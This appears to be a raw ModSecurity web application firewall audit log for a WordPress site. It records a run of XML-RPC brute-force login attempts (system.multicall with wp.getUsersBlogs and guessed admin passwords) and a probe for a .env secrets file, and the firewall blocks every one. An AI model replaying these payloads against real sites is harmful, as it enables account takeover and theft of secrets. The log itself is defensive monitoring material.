system.multicallmethodNamewp.getUsersBlogsparamsadmin123 --a2054375-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2054375-E-- --a2054375-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 69.49.228.101 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103164319302 5800 (- - -) Stopwatch2: 1749103164319302 5800; combined=4135, p1=497, p2=3465, p3=0, p4=0, p5=102, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2054375-Z-- --6e6bb52c-A-- [05/Jun/2025:13:00:05 +0700] aEEyZeth7G2xELALzPYi0wAAANE 103.236.140.4 36878 103.236.140.4 8181 --6e6bb52c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --6e6bb52c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh121 --6e6bb52c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e6bb52c-E-- --6e6bb52c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103205503740 5849 (- - -) Stopwatch2: 1749103205503740 5849; combined=4130, p1=519, p2=3411, p3=0, p4=0, p5=115, sr=90, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e6bb52c-Z-- --b4984431-A-- [05/Jun/2025:13:00:47 +0700] aEEyj-th7G2xELALzPYi3gAAAMQ 103.236.140.4 36908 103.236.140.4 8181 --b4984431-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b4984431-C-- system.multicallmethodNamewp.getUsersBlogsparamswp_updatesw0rdpr3ss --b4984431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4984431-E-- --b4984431-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103247196861 5791 (- - -) Stopwatch2: 1749103247196861 5791; combined=4161, p1=540, p2=3341, p3=0, p4=0, p5=155, sr=130, sw=125, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4984431-Z-- --8b0bbe46-A-- [05/Jun/2025:13:01:35 +0700] aEEyv-th7G2xELALzPYi8QAAAMc 103.236.140.4 36954 103.236.140.4 8181 --8b0bbe46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8b0bbe46-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAa123456 --8b0bbe46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b0bbe46-E-- --8b0bbe46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103295606206 4951 (- - -) Stopwatch2: 1749103295606206 4951; combined=3698, p1=384, p2=3142, p3=0, p4=0, p5=104, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b0bbe46-Z-- --29dca246-A-- [05/Jun/2025:13:01:51 +0700] aEEyz-th7G2xELALzPYi-AAAAM4 103.236.140.4 36972 103.236.140.4 8181 --29dca246-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 152.53.50.108 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 152.53.50.108 X-Forwarded-Proto: https Connection: close Content-Length: 477 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --29dca246-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdmin1234 --29dca246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29dca246-E-- --29dca246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 152.53.50.108 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103311580674 4583 (- - -) Stopwatch2: 1749103311580674 4583; combined=3473, p1=382, p2=2930, p3=0, p4=0, p5=94, sr=71, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29dca246-Z-- --acf48d5b-A-- [05/Jun/2025:13:04:17 +0700] aEEzYSrHpfaS2Cuwh8XUYgAAAEY 103.236.140.4 37028 103.236.140.4 8181 --acf48d5b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 198.154.250.110 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 198.154.250.110 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --acf48d5b-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminF*uckYou --acf48d5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acf48d5b-E-- --acf48d5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 198.154.250.110 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103457523349 5906 (- - -) Stopwatch2: 1749103457523349 5906; combined=4234, p1=504, p2=3553, p3=0, p4=0, p5=104, sr=103, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acf48d5b-Z-- --024fcc3d-A-- [05/Jun/2025:13:06:07 +0700] aEEzz-th7G2xELALzPYjAwAAAME 103.236.140.4 37084 103.236.140.4 8181 --024fcc3d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --024fcc3d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix@1234 --024fcc3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --024fcc3d-E-- --024fcc3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.215.172.242 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103567775788 5762 (- - -) Stopwatch2: 1749103567775788 5762; combined=4065, p1=518, p2=3371, p3=0, p4=0, p5=104, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --024fcc3d-Z-- --513a180c-A-- [05/Jun/2025:13:06:30 +0700] aEEz5irHpfaS2Cuwh8XUZgAAAEk 103.236.140.4 37114 103.236.140.4 8181 --513a180c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --513a180c-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin*2020 --513a180c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --513a180c-E-- --513a180c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103590332113 35746 (- - -) Stopwatch2: 1749103590332113 35746; combined=64332, p1=492, p2=3398, p3=0, p4=0, p5=30238, sr=89, sw=71, l=0, gc=30133 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --513a180c-Z-- --02e95f23-A-- [05/Jun/2025:13:08:36 +0700] aEE0ZFwdJdhOudw5hdzPawAAAIY 103.236.140.4 37176 103.236.140.4 8181 --02e95f23-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --02e95f23-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin01! --02e95f23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02e95f23-E-- --02e95f23-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103716926580 5045 (- - -) Stopwatch2: 1749103716926580 5045; combined=3818, p1=377, p2=3177, p3=0, p4=0, p5=153, sr=82, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02e95f23-Z-- --e153b10b-A-- [05/Jun/2025:13:09:33 +0700] aEE0neth7G2xELALzPYjFwAAAMM 103.236.140.4 37206 103.236.140.4 8181 --e153b10b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e153b10b-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh01! --e153b10b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e153b10b-E-- --e153b10b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103773733761 5668 (- - -) Stopwatch2: 1749103773733761 5668; combined=4011, p1=528, p2=3318, p3=0, p4=0, p5=98, sr=96, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e153b10b-Z-- --cce16f04-A-- [05/Jun/2025:13:09:42 +0700] aEE0puth7G2xELALzPYjGgAAAMU 103.236.140.4 37212 103.236.140.4 8181 --cce16f04-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 66.29.147.231 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 66.29.147.231 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --cce16f04-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminTest@123 --cce16f04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cce16f04-E-- --cce16f04-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 66.29.147.231 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103782150452 5355 (- - -) Stopwatch2: 1749103782150452 5355; combined=3847, p1=442, p2=3226, p3=0, p4=0, p5=106, sr=86, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cce16f04-Z-- --e1f02d12-A-- [05/Jun/2025:13:10:38 +0700] aEE03n-K7ToMdu-YSIIkowAAAAQ 103.236.140.4 37236 103.236.140.4 8181 --e1f02d12-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 136.144.183.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 136.144.183.6 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e1f02d12-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1982 --e1f02d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1f02d12-E-- --e1f02d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 136.144.183.6 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103838457110 5161 (- - -) Stopwatch2: 1749103838457110 5161; combined=3794, p1=465, p2=3160, p3=0, p4=0, p5=99, sr=89, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1f02d12-Z-- --54bd854f-A-- [05/Jun/2025:13:10:47 +0700] aEE05-th7G2xELALzPYjIQAAAM0 103.236.140.4 37242 103.236.140.4 8181 --54bd854f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.253.43.167 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.253.43.167 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --54bd854f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2011 --54bd854f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54bd854f-E-- --54bd854f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.253.43.167 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103847944962 5246 (- - -) Stopwatch2: 1749103847944962 5246; combined=3854, p1=489, p2=3196, p3=0, p4=0, p5=99, sr=90, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54bd854f-Z-- --45c0b655-A-- [05/Jun/2025:13:11:05 +0700] aEE0-eth7G2xELALzPYjJAAAANA 103.236.140.4 37252 103.236.140.4 8181 --45c0b655-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3704.400 QQBrowser/10.4.3587.400 Accept-Charset: utf-8 --45c0b655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45c0b655-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749103865382110 667 (- - -) Stopwatch2: 1749103865382110 667; combined=284, p1=250, p2=0, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45c0b655-Z-- --e3124626-A-- [05/Jun/2025:13:11:44 +0700] aEE1IH-K7ToMdu-YSIIkpgAAAAo 103.236.140.4 37268 103.236.140.4 8181 --e3124626-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.68.62.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.68.62.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e3124626-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh05 --e3124626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3124626-E-- --e3124626-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.68.62.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103904271110 5710 (- - -) Stopwatch2: 1749103904271110 5710; combined=4021, p1=519, p2=3334, p3=0, p4=0, p5=99, sr=85, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3124626-Z-- --b89e8d2f-A-- [05/Jun/2025:13:12:08 +0700] aEE1OFwdJdhOudw5hdzPbwAAAIo 103.236.140.4 37272 103.236.140.4 8181 --b89e8d2f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b89e8d2f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix01 --b89e8d2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b89e8d2f-E-- --b89e8d2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749103928801557 6153 (- - -) Stopwatch2: 1749103928801557 6153; combined=4376, p1=527, p2=3611, p3=0, p4=0, p5=135, sr=100, sw=103, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b89e8d2f-Z-- --583d2d65-A-- [05/Jun/2025:13:16:06 +0700] aEE2JlwdJdhOudw5hdzPeAAAAJM 103.236.140.4 37374 103.236.140.4 8181 --583d2d65-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.215.172.242 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.215.172.242 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --583d2d65-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin@777 --583d2d65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --583d2d65-E-- --583d2d65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 